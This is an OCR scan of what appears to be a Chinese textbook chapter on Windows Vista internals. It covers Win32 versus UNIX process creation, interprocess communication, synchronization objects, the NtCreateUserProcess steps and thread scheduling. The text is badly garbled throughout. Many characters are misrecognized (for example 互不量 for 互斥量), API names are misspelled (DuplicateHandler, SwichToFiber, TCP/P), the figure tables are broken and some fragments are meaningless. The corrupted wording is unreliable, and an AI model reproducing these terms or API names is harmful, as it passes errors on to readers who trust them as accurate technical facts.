
2) 当 前 工作 目录 在 UNIX 操 作 系 统 里 是 一 个 内 核 态 的 概念 ， 但 是 在 
Windows 里 是 用 户 态 字符 串 。Windows 为 每 个 进程 都 打开 当前 目录 的 一 
个 句柄 ， 这 导致 了 和 UNIX 一 样 的 麻烦 : 除了 碰巧 工作 目录 是 跨 网 络 的 
情况 下 可 以 删除 它 ， 其 他 工作 目 邓 都 古 不 能 删除 的 。 


3)UNIX 解 析 命 令 行 ， 并 传递 参数 数组 ， 而 Win32 需 要 每 个 程序 自 
己 解析 参数 。 其 结果 是 ， 不 同 的 程序 可 能 采用 不 一 致 的 方式 处 理 通 配 
符 (如 *.txt) 和 其 他 特殊 字符 。 


4) 在 UNIX 中 ， 文 件 摘 述 符 是 否 可 以 被 继承 是 句柄 的 一 个 属性 。 不 
过 在 Windows 中 ， 其 同时 是 句柄 和 进程 创建 参数 的 属性 。 


5)Win32 是 面向 图 形 用 户 界 面 的 ， 因 此 新 进程 能 直接 获得 其 窗口 信 
四 ， 而 在 UNIX 中 ， 这 些 信息 是 通过 参数 传递 给 图 形 用 户 界面 程序 的 。 


6)Windows 中 的 可 执行 代码 没有 SETUID 位 属性 ， 不 过 一 个 进程 也 
可 以 为 另 一 个 用 户 创建 进程 ， 只 要 其 能 获得 该 用 户 的 信用 标识 。 


7)Windows 返 回 的 进程 、 线 程 句柄 可 以 用 在 很 多 独立 的 方法 中 修改 
新 进程 /线程 ， 例 如 复制 句柄 、 在 新 进程 中 设置 环境 变量 等 。UNIX 则 只 
在 fork 和 exec 调 用 的 时 候 修改 新 进程 。 


这 些 不 同 有 些 是 来 自 历史 原因 和 哲学 原因 。UNIX 的 设计 是 面向 命 
令 行 的 ， 而 不 是 像 wWindows 那 样 面向 图 形 用 户 界 面 的 。UNIX 的 用 户 相 
比 来 说 更 高 级 ， 同 时 也 懂得 像 PATH 环境 变量 的 概念 。Windows Vista 继 
承 了 很 多 MS-DOS 中 的 东西 。 


这 种 比较 也 有 点 偏颇 ， 因 为 Win32 是 一 个 用 户 态 下 的 对 NT 本 地 进 
程 执行 的 包装 器 ， 就 像 UNIX 下 的 系统 库 范 数 fork/exec 的 封 狼 。 实 际 的 


NT 中 创建 进程 和 线程 的 系统 调用 NtCreateProcess 和 NtCreateThread 比 
Win32 版 本 简单 得 多 。NT 进 程 创建 的 主要 参数 包括 代表 所 要 运行 的 程 
序 文件 句柄 、 一 个 指定 新 进程 是 否 黑 认 继承 创建 者 句柄 的 标志 ， 以 及 
有 关 安 全 模型 的 相关 参数 。 由 于 用 户 态 下 的 代码 能 够 使 用 新 建 进程 的 
句柄 能 对 新 进程 的 虚拟 地 址 空间 进行 直接 的 操作 ， 所 有 关于 建立 环境 
变量 、 创 建 初 始 线程 的 细 闻 就 留 给 用 户 态 代码 来 解决 。 


为 了 文 持 POSIX 子 系统 ， 本 地 进程 创建 有 一 个 选项 可 以 指定 ， 通 
过 拷贝 男 一 个 进程 的 虚拟 地 址 空间 来 创建 一 个 新 进程 ， 而 不 是 通过 映 
射 一 个 新 程序 的 段 对 象 来 新 建 进程 。 这 种 方式 只 用 在 实现 POSIX 的 
fork， 而 不 是 Win32 的 。 


线程 创建 时 传 给 新 线程 的 参数 包括 : CPU 的 上 下 文 信息 (包括 栈 
指针 和 起 始 指令 地 址 ) 、TEB 模 板 、 一 个 表示 线程 创建 后 马上 运行 或 
以 挂 起 状态 创建 《等 竺 有 人 对 线程 句柄 调用 NtResumeThread 函 数 ) 的 
标志 。 用 户 态 下 的 栈 的 创建 以 及 argwargc 参 数 的 压 入 需要 由 用 户 态 下 的 
代码 来 解决 ， 必 须 对 进程 句柄 调用 本 地 NT 的 内 存 管理 API 。 


在 Windows Vista 的 发 行 版 中 ， 包 含 了 一 个 新 的 天 于 进程 操作 方面 
的 本 地 API， 这 个 接口 将 原来 许多 用 户 态 下 的 步骤 转移 到 了 内 核 态 下 执 
行 ， 同 时 将 进程 创建 与 起 始 线程 创建 绑 定 在 一 起 进行 。 作 这 种 改变 的 
原因 是 支持 通过 进程 划分 信任 边界 。 一 般 来 说 ， 所 有 用 户 创建 的 进程 
被 同等 信任 ， 由 用 户 决 定 信任 边界 在 哪里 。 在 Windows Vista 中 的 这 个 


改变 ， 人 允许 进程 也 可 以 提供 信任 边界 ， 但 是 这 意味 着 对 于 新 进程 句柄 
来 说 ， 创 建 者 进程 没有 足够 的 权利 在 用 户 态 下 实现 进程 创建 的 细 有 。 


1. 进 程 间 通 信 


线程 间 可 以 通过 多 种 方式 进行 通信 ， 包 括 管道 、 命 名 管道 、 邮 件 
柳 、 套 接 字 、 远 程 过 程 调 用 (RPC) 、 共 享 文件 等 。 管 道 有 两 种 模 
式 : 字 节 管道 和 消息 管道 ， 可 以 在 创建 的 时 候选 择 。 字 市 模式 的 管道 
的 工作 方式 与 UNIX 下 的 工作 方式 一 样 。 请 恩 模 式 的 管道 与 字 万 模式 的 
管道 大 致 相同 ， 但 会 维护 消 忍 边界。 所 以 写 入 四 次 的 128 字 节 ， 读 出 来 
也 是 四 个 128 字 市 的 消 忌 ， 而 不 会 像 子 慷 模 式 的 管道 一 样 读 出 的 是 一 个 
512 字 区 的 消息 。 命 名 管道 在 Vista 中 也 是 有 的 ， 跟 普通 的 管道 一 样 都 有 
两 种 模式 ， 但 命名 管道 可 以 在 网 络 中 使 用 ， 而 普通 管道 只 能 在 单机 中 
合用 名 


邮件 槽 是 OS/2 操 作 系统 的 特性 ， 在 Windows 中 实现 只 是 为 了 兼容 
性 。 它 们 在 某 种 方式 上 跟 管 道 类 似 ， 但 不 完全 相同 。 自 先 ， 它 们 古 单 
向 的 ， 而 管道 则 是 双向 的 。 而 且 ， 它 们 能 够 在 网 络 中 使 用 但 不 提供 有 
保证 的 传输 。 最 后 ， 它 们 允许 发 送 进 程 将 消 恩 广播 给 多 个 接收 者 而 不 
仅仅 是 一 个 接收 着 。 邮 件 槽 和 命名 管道 在 Windows 中 都 是 以 文件 系统 的 
形式 实现 ， 而 非 可 执行 的 功能 函数 。 这 样 做 就 可 以 通过 现 有 的 远程 文 
件 系统 协议 在 网 络 上 来 访问 到 它们 。 
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个 进程 。 例 如 ， 一 个 进程 往 一 个 套 搂 字 里 面 写 入 内 容 ， 远 程 机 万 上 的 
另外 一 个 进程 从 这 个 套 接 字 中 读 出 来 。 套 接 字 同样 也 可 以 被 用 在 同一 
台 机 亏 上 的 进程 通信 ， 但 写 因 为 它们 比 管道 市 来 了 更 大 的 开销 ， 所 以 
一 般 来 说 它们 只 被 用 于 网 络 环境 下 的 通信 。 套 接 字 原来 是 为 伯克利 
UNIX 而 设计 的 ， 它 的 实现 代码 很 多 都 是 可 用 的 ， 正 如 Windows 发 布 日 
志 里 面 所 写 的 ，Windows 代 码 中 使 用 了 一 些 伯克利 的 代码 及 数据 结构 。 


远程 过 程 调用 (RPC) 是 一 种 进程 A 命令 进程 B 调 用 进程 B 地 址 空 
间 中 的 一 个 函数 ， 然 后 将 执行 结果 返回 给 进程 A 的 方式 。 在 这 个 过 程 中 
对 参数 的 限制 很 多 。 例 如 ， 如 果 传 递 的 是 个 指针 ， 那 么 对 于 进程 B 来 说 
这 个 指针 毫 无 意义 ， 因 此 必须 把 数据 结构 打包 起 来 然后 以 进程 无 关 的 
方式 传输 。 实 现 RPC 的 时 候 ， 通 常 是 把 它 作 为 传输 层 之 上 的 抽象 层 来 
实现 。 例 如 对 于 Windows 来 说 ， 可 以 通过 TCP/P 套 接 字 、 命 名 管道 、 
ALPC 来 进行 传输 。ALPC 的 全 称 是 高 级 本 地 过 程 调 用 (Advanced Local 
Procedure Call) ， 它 是 内 核 态 下 的 一 种 消息 传递 机 制 ， 为 同一 台 机 器 
中 的 进程 间 通 信 作 了 优化 ， 但 不 支持 网 络 间 通信 。 基 本 的 设计 思想 是 
可 以 发 送 有 回复 的 消息 ， 以 此 来 实现 一 个 轻 量 级 的 RPC 版 本 ， 提 供 比 
ALPC 更 丰富 的 特性 。ALPC 的 实现 是 通过 找 贝 参数 以 及 基于 消息 大 小 
的 临时 共享 内 存 分 配 。 


最 后 ， 进 程 间 可 以 共享 对 象 ， 如 有 段 对 象 。 段 对 象 可 以 同时 被 映射 
到 多 个 进程 的 虚拟 地 址 空间 中 ， 一 个 进程 执行 了 写 操 作 之 后 ， 其 他 进 
程 可 以 也 可 以 看 见 这 个 写 操作 。 通 过 这 个 机 制 ， 在 生产 者 消费 者 问题 
中 用 到 的 共享 缓冲 区 就 可 以 轻松 地 实现 。 


2. 同 步 


进程 间 也 可 以 使 用 多 种 形式 的 同步 对 象 。 就 像 Windows Vista 中 提 
供 了 多 种 形式 的 进程 间 通 信 机 制 一 样 ，Vista 也 提供 了 多 种 形式 的 同步 
机 制 ， 包 括 信号 量 、 互 不 量 、 临 界 区 和 事件 。 所 有 的 这 些 机 制 只 在 线 
程 上 工作 ， 而 非 进程 。 所 以 当 一 个 线程 由 于 一 个 信号 量 而 阻塞 时 ， 同 
一 个 进程 的 其 他 线程 (如 果 有 的 话 ) 会 继续 运行 而 并 不 会 被 影响 。 


使 用 Win32 的 API 函 数 CreateSemaphore 可 以 创建 一 个 信号 量 ， 可 以 
将 它 初始 化 为 一 个 给 定 的 值 ， 同 时 也 可 以 指定 最 大 值 。 信 和 号 量 是 一 个 
内 核 态 对 象 ， 因 此 拥有 安全 描述 竺 和 句柄 。 信 号 量 的 句柄 可 以 通过 使 
用 DuplicateHandler 来 进行 复制 ， 然 后 传递 给 其 他 进程 使 得 多 个 进程 可 
以 通过 相同 的 信号 量 来 进行 同步 。 在 Win32 的 名 字 空 间 中 一 个 信号 量 
可 以 被 命名 ， 可 以 拥有 一 个 ACL 和 集合 来 保 扩 它 。 有 些 时 候 通 过 名 字 来 
共享 信号 量 比 通过 撕 贝 句柄 更 合适 。 


对 up 和 down 的 调用 也 是 有 的 ， 只 不 过 它们 的 画 数 名 看 起 来 比较 奇 
怪 : ReleaseSemaphore (up) 和 WaitForSingleObject (down) 。 可 以 给 


WaitForSingleObject 一 个 超时 时 间 ， 使 得 尽管 此 时 信号 量 仍然 是 0， 调 
用 它 的 线程 仍然 可 以 被 释放 〈 尽 管 定时 器 重新 引入 了 竞 态 ) 。 
WaitForSingleObject 和 WaitForMultipleObject 是 将 在 11.3 节 中 讨论 的 分 发 
者 对 象 的 营 见 接口 。 尽 管 有 可 能 将 单个 对 象 的 API 封 装 成 看 起 来 更 加 像 
言 号 量 的 名 字 ， 但 是 许多 线程 使 用 多 个 对 象 的 版 本 ， 这 些 对 象 可 能 是 
各 种 各 样 的 同步 对 象 ， 也 可 能 是 其 他 类 似 进程 或 线程 结束 、LO 结 
消息 到 达 套 接 字 和 端口 等 事件 。 


互 不 量 也 是 用 于 同步 的 内 核 态 对 象 ， 但 是 比 信号 量 简 单 ， 因 为 互 
不 量 不 需要 计数 器 。 它 们 其 实 是 锁 ， 上 锁 的 函数 是 
WaitForSingleObject， 解 锁 的 函数 是 ReleaseMutex。 就 像 信号 量 句柄 一 
样 ， 互 斥 量 的 句柄 也 可 以 复制 ， 并 且 在 进程 间 传 递 ， 从 而 不 同 进程 间 
的 线程 可 以 访问 同一 个 互 不 量 。 


第 三 种 同步 机 制 是 临界 区 ， 实 现 的 是 临界 区 的 概念 。 临 界 区 在 
Windows 中 与 互 斥 量 类 似 ， 但 是 临界 区 相对 于 主创 建 线程 的 地 址 空间 来 
说 是 本 地 的 。 因 为 临界 区 不 是 内 核 态 的 对 象 ， 所 以 它们 没有 显 式 的 句 
柄 或 安全 描述 符 ， 而 且 也 不 能 在 进程 间 传 递 。 上 锁 和 解锁 的 函数 分 别 
是 EnterCriticalSection 和 LeaveCriticalSection。 因 为 这 些 API 函 数 在 开始 
的 时 候 只 是 在 用 户 空 间 中 ， 只 有 当 需 要 阻塞 的 时 候 才 调用 内 核 函 数 ， 
它们 比 互 斥 量 快 得 多 。 在 需要 的 时 候 ， 可 以 通过 合并 自 旋 锁 (在 多 处 
理 器 上 ) 和 内 核 同步 机 制 来 优化 临界 区 。 在 许多 应 用 中 ， 大 多 数 的 临 


界 区 几乎 不 会 被 竞争 或 者 只 被 锁 住 很 短 的 时 间 ， 以 至 于 没 必要 分 配 一 
个 内 核 同步 对 象 ， 这 样 会 极 大 地 节省 内 核 内 存 。 


我 们 讨论 的 最 后 一 种 同步 机 制 叫 事件 ， 它 使 用 内 核 态 对 象 。 束 像 
我 们 前 面 描述 的 ， 有 两 类 的 事件 一 一 通知 事件 和 同步 事件 。 一 个 事件 
的 状态 有 两 种 : 收 到 信号 和 没收 到 信号 。 一 个 线程 通过 调用 
WaitForSingleObject 来 等 符 一 个 事件 被 信号 通知 。 如 采 另 一 个 线程 通过 
SetEvent 给 事件 发 信号 ， 会 发 生 什 么 取决 于 这 个 事件 的 类 型 。 对 于 通知 
事件 来 说 ， 所 有 等 行 线程 都 会 被 释放 ， 并 且 事件 保持 在 set 状 态 ， 直 到 
手工 调用 ResetEvent 进 行 清除 ， 对 于 同步 事件 来 说 ， 如 果 有 一 个 或 多 个 
线程 在 等 待 ， 那 么 有 且 仅 有 一 个 线程 会 被 唤醒 并 且 事 件 被 清除 。 另 一 
个 替换 的 操作 是 PulseEvent， 像 SetEvent 一 样 ， 除 了 在 没有 人 等 待 的 时 
候 脉 冲 会 丢失 ， 而 事件 也 被 清除 。 相 反 ， 如 果 调 用 SetEvent 时 没有 等 行 
的 线程 ， 那 么 这 个 设置 动作 依然 会 起 作用 ， 被 设置 的 事件 处 于 被 信和 号 
通知 的 状态 ， 所 以 当 后 面 的 那个 线程 调用 等 待 事件 的 API 时 ， 这 个 线程 
将 不 会 等 待 而 直接 返回 。 


Win32 的 API 中 关于 进程 、 线 程 、 纤 程 的 个 数 将 近 100 个 ， 其 中 大 量 
的 是 各 种 形式 的 处 理 IPC 的 函数 。 对 上 面 讨论 的 总 结 和 另 一 些 比 较 重 要 
的 内 容 可 以 参见 图 11-26。 


Win32 API 函数 

CreateProcess 创建 一 个 新 的 进程 

CreateThread 在 已 存在 的 进程 中 创建 一 个 新 的 线程 

CreateFiber 创建 一 个 新 的 纤 程 

ExitProcess 终止 当前 进程 及 其 全 部 线程 

ExitThread 终止 该 线程 

ExitFiber 终止 该 纤 程 

SwichToFiber 在 当前 线程 中 运行 另 - 
SetPriorityClass 设置 进程 的 优先 级 类 
SetThreadPriority 设置 线程 的 优先 级 
CreateSemaphore 创建 一 个 新 的 信号 量 

创建 一 个 新 的 互 斥 量 

打开 一 个 现 有 的 信号 量 

打开 一 个 现 有 的 互 斥 量 


WaitForSingleObject 等 待 一 个 单一 的 信号 量 、 互 斥 量 等 
WaitForMultipleObjects | 等 待 一 系列 已 有 句柄 的 对 象 
PulseEvent 设置 事件 激活 ， 再 变 成 未 激活 
ReleaseMutex 释放 互 斥 量 使 其 他 线程 可 以 获得 它 
ReleaseSemaphore 使 信号 量 增加 1 

EnterCriticalSection 得 到 临界 区 的 锁 
leaveCriticalSection 释放 临界 区 的 锁 


图 11-26 一 些 管理 进程 、 线 程 以 及 纤 程 的 一 些 Win32 调 用 


可 以 注意 到 不 是 所 有 的 这 些 都 是 系统 调用 。 其 中 有 一 些 是 包装 
鲁 ， 有 一 些 包 含 了 重要 的 库 代 码 ， 这 些 库 代码 将 Win32 的 接口 映 冉 到 本 
地 NT 接口 。 另 外 一 些 ， 例 如 纤 程 的 API， 全 部 都 是 用 户 态 下 的 函数 ， 
因为 就 像 我 们 之 前 提 到 的 ，Windows Vista 的 内 核 态 中 根本 没有 纤 程 的 
概念 ， 纤 程 完全 都 是 由 用 户 态 下 的 库 来 实现 的 。 


11.4.3 ”进程 和 线程 的 实现 


本 节 将 用 更 多 细节 来 讲述 Windows 如 何 创 建 一 个 进程 。 因 为 Win32 
是 最 具 文 档 化 的 接口 ， 因 此 我 们 将 从 这 里 开始 讲述 。 我 们 迅速 进入 内 
核 来 理解 创建 一 个 新 进程 的 本 地 API 调 用 是 如 何 实现 的 。 这 里 有 很 多 细 
节 我 们 都 将 略 过 ， 比 如 在 创建 一 个 路 径 的 时 候 ，WOW16 和 WOW64 有 
怎样 专用 的 代码 ， 以 及 系统 如 何 提供 特定 应 用 的 修补 来 修正 应 用 程序 
中 的 小 的 不 兼容 性 和 延迟 错误 。 我 们 主要 集中 在 创建 进程 时 执行 的 主 
代码 路 径 ， 以 及 看 一 看 我 们 已 经 介绍 的 知识 之 间 还 欠缺 的 一 些 细节 。 


当 用 一 个 进程 调用 Win32 CreateProcess 系 统 调用 的 时 候 ， 则 创建 一 
个 新 的 进程 。 这 种 调用 使 用 kernel32.dll 中 的 一 个 (用 户 态 ) 进程 来 分 几 
步 创 建新 进程 ， 其 中 会 使 用 多 次 系统 调用 和 执行 其 他 的 一 些 操 作 。 


1) 把 可 执行 的 文件 名 从 一 个 Win32 路 径 名 转化 为 一 个 NT 路 径 名 。 如 
果 这 个 可 执行 文件 仅 有 一 个 名 字 ， 而 没有 一 个 目录 名 ， 那 么 就 在 默认 
的 目 隶 里面 查找 (包括 ， 但 不 限于 ， 那 些 在 PATH 环 境 变 量 中 的 ) 。 


2) 绑 定 这 个 创建 过 程 的 参数 ， 并 且 把 它们 和 可 执行 程序 的 完全 路 径 
名 传递 给 本 地 API NtCreateUserProcess。 (这 个 API 被 增加 到 Window 
Vista 使 得 创建 进程 的 细节 可 以 在 内 核 态 里 处 理 ， 从 而 让 进程 可 以 在 可 


信 的 边界 内 使 用 。 之 前 介绍 的 那些 API 仍 然 是 存在 的 ， 只 是 不 再 被 
Win32 的 CreateProcess 调 用 使 用 。) 


3) 在 内 核 态 里 运行 ，NtCreateUserProcess 执 行 参 数 ， 然 后 打开 这 个 
进程 的 映像 ， 创 建 一 个 内 存 区 对 象 (section object) ， 它 能 够 用 来 把 程 
序 映射 到 新 进程 的 虚拟 地 址 空间 。 


4) 进 程 管理 器 分 配 和 初始 化 进程 对 象 。 〈 对 于 内 核 和 执行 层 ， 这 个 
内 核 数 据 结构 就 表示 一 个 进程 。) 


5) 内 存 管 理 器 通过 分 配 和 创建 页 目录 及 虚拟 地 址 描述 符 来 为 新 进程 
创建 地 址 空间 。 虚 拟 地 址 描述 符 描述 内 核 态 部 分 ， 包 括 特 定 进 程 的 区 
域 ， 例 如 目 英 射 的 页 目 孙 入 口 可 以 为 每 一 个 进程 在 内 核 仿 使 用 内 核 虚 
拟 地 址 来 访问 它 整个 页 表 中 的 物理 页 面 。 


6) 一 个 句柄 表 为 新 的 进程 所 创建 。 所 有 来 自 于 调用 者 并 允许 被 继承 
的 句柄 都 被 复制 到 这 个 句柄 表 中 。 


7) 共 享 的 用 户 页 被 映射 ， 并 且 内 存 管理 器 初始 化 一 个 工作 集 的 数据 
结构 ， 这 个 数据 结构 是 在 物理 内 存 缺 少 的 时 候 用 来 决定 哪些 页 可 以 从 
一 个 进程 里 面 移出 。 可 执行 映像 中 由 内 存 区 对 象 表示 的 部 分 会 被 映射 
到 新 进程 的 用 户 态 地 址 空间 。 


8) 执 行 体 创 建 和 初始 化 用 户 态 的 进程 环境 块 PEB)， 这 个 PEB 为 用 
户 态 和 内 核 用 来 维护 进程 范围 的 状态 信息 ， 例 如 用 户 态 的 扒 指针 和 可 
加 载 库 列 表 (DLL)。 


9) 虚 拟 内 存 是 分 配 在 (IDR) 新 进程 里 面 的 ， 并 且 用 于 传递 参 
数 ， 包 括 环境 变量 和 命令 行 。 


10) 一 个 进程 ID 从 特殊 的 句柄 表 (ID 表 ) 分 配 ， 这 个 句柄 表 是 为 了 
有 效 地 定位 进程 和 线程 局 部 唯一 的 ID 。 


11) 一 个 线程 对 象 被 分 配 和 初始 化 。 在 分 配 线程 环境 块 (TEB) 的 
同时 ， 也 分 配 一 个 用 户 态 栈 。 包 含 了 线程 的 为 CPU 寄存 器 保持 的 初始 
值 (包括 指令 和 栈 指针 ) 的 CONTEXT 记 录 也 被 初始 化 了 。 


12) 进 程 对 象 被 放 入 进程 全 局 列表 中 。 进 程 和 线程 对 象 的 句柄 被 分 
配 到 调用 者 的 句柄 表 中 。ID 表 会 为 初始 线程 分 配 一 个 ID。 


13)NtCreateUserProcess 同 用 户 态 返回 新 建 的 进程 ， 其 中 包括 处 于 就 
绪 并 被 挂 起 的 单一 线程 。 


14) 如 果 NT API 失 败 ，Win32 代 码 会 查看 进程 是 否 属于 男 一 子 系 
统 ， 如 WOW64。 或 者 程序 可 能 设置 为 在 调试 状态 下 运行 。 以 上 特殊 情 
况 由 用 户 态 的 CreateProcess 代 人 码 处 理 。 


15) 如 果 NtCreateUserProcess 成 功 ， 还 有 一 些 操作 要 完成 。Win32 进 
程 必须 向 Win32 子 系统 进程 csrss.exe 注 册 。Kernel32.d1 癌 csrss.exe 发 送信 
息 一 一 新 的 进程 及 其 句柄 和 线程 句柄 ， 从 而 进程 可 以 自我 复制 了 7。 进 
程 和 线程 加 入 子 系统 列表 中 ， 从 而 它们 拥有 了 所 有 Win32 的 进程 和 线程 
的 完整 列表 。 子 系统 此 时 就 显示 一 个 的 带 沙 漏 光标 表明 系统 正 运 行 ， 
但 光标 还 能 使 用 。 当 进程 首次 调用 GUI 函数 ， 通 常 是 创建 新 窗口 ， 光 标 
将 消失 (如 果 没 有 调用 到 来 ，2 秒 后 就 会 超时 ) 。 


16) 如 果 进 程 受 限 ， 如 低 权 限 的 Internet Explorer， 令 牌 会 被 改变 ， 
限制 狐 进 程 访问 对 象 。 


17) 如 采 应 用 程序 被 设置 成 需要 与 当前 Windows 版 本 加 禁 层 
(shim) 地 兼容 运行 ， 则 特定 的 执 层 将 运行 (AYER ETRE Val FDL 
稍微 修改 它们 的 行为 ， 例 如 返回 一 个 假 的 版 本 号 或 者 延迟 内 存 的 释 
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18) 最 后 ， 调 用 NtResumeThread 挂 起 线程 ， 并 把 这 个 结构 返回 给 包 
含 所 创建 的 进程 和 线程 的 ID、 人 句柄 的 调用 者 。 


调度 


Windows 内 核 没 有 任何 中 央 调 度 线程 。 所 以 ， 当 一 个 线程 不 能 够 再 
执行 时 ， 线 程 将 进入 内 核 态 ， 调 度 线程 再 决定 转向 的 下 一 个 线程 。 在 
下 面 这 些 情况 下 ， 当 前 正在 执行 的 线程 会 执行 调度 程序 代码 : 


1. 当 前 执行 的 线程 发 生 了 信和 号 量 、 互 不 、 事 件 、1WO 等 类 型 的 阻 


nt 


2. 线 程 向 一 个 对 象 发 信号 (如 发 一 个 信号 或 者 是 唤醒 一 个 事件 ) 
时 。 


3. 配 额 过 期 。 


第 一 种 情况 ， 线 程 已 经 在 内 核 态 运行 并 开始 对 调度 器 或 输入 输出 
对 象 执 行 操作 了 。 它 将 不 能 继续 执行 ， 所 以 线程 会 请 求 调度 程序 代码 
寻找 装载 下 一 个 线程 的 CONTEXT 记 录 去 恢复 其 执行 。 


第 二 种 情况 ， 线 程 也 是 在 内 核 中 运行 。 但 是 ， 在 向 一 些 对 象 发 出 
言 号 后 ， 它 肯定 还 能 够 继续 执行 ， 因 为 发 信号 对 象 从 来 没有 受到 阻 
塞 。 然 而 ， 线 程 必须 请 求 调度 程序 ， 来 观测 它 的 执行 结果 是 否 释 放 了 
一 个 具有 更 高 调度 优先 级 的 正 准备 运行 的 线程 。 如 果 是 这 样 ， 因 为 
Windows 完 全 是 可 抢占 式 的 ， 所 以 就 会 发 生 一 个 线程 切换 (例如 ， 线 程 
切换 可 以 发 生 在 任何 时 候 ， 不 仅仅 是 在 当前 线程 结束 时 ) 。 但 是 ， 在 
多 处 理 占 的 情况 下 ， 处 于 就 绪 状 态 的 线程 会 在 男 一 个 CPU 上 被 调度 , 那 
么 ， 即 使 原来 线程 拥有 较 低 的 调度 优先 级 ， 也 能 在 当前 的 CPU 上 继续 
执行 。 


at 


第 三 种 情况 ， 内 核 态 发 生 中 断 ， 这 时 线程 执行 调度 程序 代码 找到 
下 一 个 运行 的 线程 。 由 于 取决 于 其 他 等 竺 的 线程 ， 可 能 会 选择 同样 的 


线程 ， 这 样 线程 就 会 获得 新 的 配额 ， 可 以 继续 执行 。 否 则 发 生 线程 切 
换 。 


在 另外 两 种 情况 下 ， 调 度 程序 也 会 被 调度 : 
1) 一 个 输入 输出 操作 完成 时 。 
2) 等 待 时 间 结 束 时 。 


在 第 一 种 情况 下 ， 线 程 可 能 处 于 等 待 输入 输出 时 被 释放 然后 执 
了 。 如 采 不 保证 最 小 执行 时 间 ， 必 须 检查 是 否 可 以 事先 对 运行 的 线程 
进行 抢占 。 调 度 程序 不 会 在 中 断 处 理 程序 中 运行 (因为 那 使 中 断 关闭 
保持 太 久 ) 。 相 反 ， 中 断 处 理发 生 后 ，DPC 会 排队 等 待 一 会 儿 。 第 二 
种 情况 下 ， 线 程 已 经 对 一 个 信号 量 进行 了 down 操 作 或 者 因 一 些 其 他 对 
象 而 被 阻塞 ， 但 是 定时 器 已 经 过 期 。 对 于 中 断 处 理 程序 来 说 ， 有 必要 
让 DPC 再 一 次 排队 等 待 ， 以 防止 它 在 定时 器 中 断 处 理 程序 时 运行 。 


N 


如 有 果 一 个 线程 在 这 个 时 刻 已 到 就 绪 ， 则 调度 程序 将 会 被 唤醒 并 且 
如 果 新 的 可 运行 线程 有 较 高 的 优先 级 ， 那 么 和 情形 1 的 情况 类 似 ， 当 前 
的 线程 会 被 抢占 。 


现在 让 我 们 来 看 看 具体 的 调度 算法 。Win32 API 提 供 两 个 API 来 影 
啊 线 程 调 度 。 首 先 ， 有 一 个 叫 SetPriorityClass 的 用 来 设 定 被 调用 进程 中 
所 有 线程 的 优先 级 。 其 等 级 可 以 是 : 实时 、 高 、 高 于 标准 、 标 准 、 低 


于 标准 和 空 几 的 。 优 先 级 决定 进程 的 先后 顺序 。 (在 Vista 系 统 中 ， 进 
程 优先 级 等 级 也 可 以 被 一 个 进程 用 来 临时 地 把 它 目 己 标记 为 后 台 运 行 
(background) 状态 ， 即 它 不 应 该 被 任何 其 他 的 活动 进程 所 干扰 。) 注 
意 优 先 级 是 对 进程 而 言 的， 但 是 实际 上 会 在 每 个 线程 被 创建 的 时 候 通 
过 设置 每 个 线程 开始 运行 的 基本 优先 级 可 以 影响 进程 中 每 条 线程 的 实 
际 优先 级 。 


第 二 个 就 是 SetThreadPriority。 它 根据 进程 的 优先 级 类 来 设 定 进程 
中 每 个 线程 的 相对 优先 级 〈 可 能 地 ， 但 是 不 必然 地 ， 调 用 线程 ) 。 可 
划分 如 下 等 级 : 紧要 的 、 最 高 的 、 高 于 标准 的 、 标 准 的 、 低 于 标准 
的 、 最 低 的 和 休眠 的 。 时 间 紧 急 的 线程 得 到 最 高 的 非 即 时 的 调度 优 
先 ， 而 空 内 的 线程 不 管 其 优先 级 类 别 都 得 到 最 低 的 优先 级 。 其 他 优先 
级 的 值 依 据 优 先 级 的 等 级 来 定 ， 依 次 为 (+2,+1,0,-1,-2) 。 进 程 优先 级 
等 级 和 相对 线程 优先 级 的 使 用 使 得 能 够 更 容易 地 确定 应 用 程序 的 优先 
级 。 


调度 程序 按照 下 列 方式 进行 调度 。 系 统 有 32 个 优先 级 ， 从 0 到 31 。 
依照 图 11-27 的 表格 ， 进 程 优 先 级 和 相对 线程 优先 级 的 组 合 形 成 32 个 绝 
对 线程 优先 级 。 在 表格 的 数字 决定 了 线程 的 基本 优先 级 (base 
priority) 。 除 此 之 外 ， 每 条 线程 都 有 当前 优先 级 (current priority) , 
这 个 当前 的 优先 级 可 能 会 高 于 (但 是 不 低 于 ) 前 面 提 到 的 基本 优先 
级 ， 关 于 这 一 点 我 们 稍 后 将 会 讨论 。 


Win32 进 程 类 优先 级 


Win32 线 | pas 
FETE ER |e 


图 11-27 Win32 优 先 级 到 Windows 优 先 级 的 映射 


为 了 使 用 这 些 优先 级 进行 调度 ， 系 统 维 护 一 个 包含 32 个 线程 列表 
的 队列 ， 分 别 对 应 图 11-27 中 的 0~31 的 不 同等 级 。 每 个 列表 包含 了 就 绪 
线程 对 应 的 优先 级 。 基 本 的 调度 算法 是 从 优先 级 队列 中 从 31 到 0 的 从 高 
优 移 级 到 低 优先 级 的 顺序 查找 。 一 旦 一 个 非 空 的 列表 被 找到 ， 等 竺 队 
首 的 线程 就 运行 一 个 时 间 片 。 如 果 时 间 配 额 已 用 完 ,这 个 线程 排 到 其 优 
先 级 的 队 尾 ， 而 排 在 前 面 的 线程 号 接 下 来 运行 。 换 句 话 说 ， 当 在 最 高 
的 优先 级 有 多 条 线程 处 于 束 绪 状态 ， 它 们 就 按时 间 厂 轮转 法 来 调度 。 
如 琳 没 有 束 绪 的 线程 ， 那 么 处 理 占 空间 ， 并 设置 成 低 功 耗 状态 来 等 
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值得 注意 的 是 ， 调 度 取 决 于 线程 而 不 是 取决 于 线程 所 属 的 进程 。 
因此 调度 程序 并 不 是 首先 查看 进程 然后 再 是 进程 中 的 线程 。 它 直接 找 
到 线程 。 调 度 程序 并 不 考虑 哪个 线程 属于 哪个 进程 ， 除 非 进行 线程 切 
换 时 需要 做 地 址 空间 的 转换 。 


为 了 改进 在 具有 大 量 处 理 器 的 多 处理 器 情况 下 的 调度 算法 的 可 伸 
缩 性 ， 调 度 管理 器 尽力 不 给 全 局 的 优先 级 表 的 数组 加 上 一 个 全 局 的 锁 
来 实现 同步 访问 控制 。 相 反 地 ， 对 于 一 个 准备 到 CPU 的 线程 来 说 ， 奉 
是 处 理 硕 已 瓯 位 ， 则 可 以 让 它 直 接 进 行 ， 而 不 必 进 行 加 锁 操 作 。 


对 于 每 一 个 进程 ， 调 度 管理 器 都 维护 了 一 个 理想 处 理 器 (ideal 
processor) 记录 ， 它 会 在 尽 可 能 的 时 候 让 线程 在 这 个 理想 处 理 器 上 运 
行 。 这 改善 了 系统 的 性 能 ， 因 为 线程 所 用 到 的 数据 驻 留 在 理想 处 理 器 
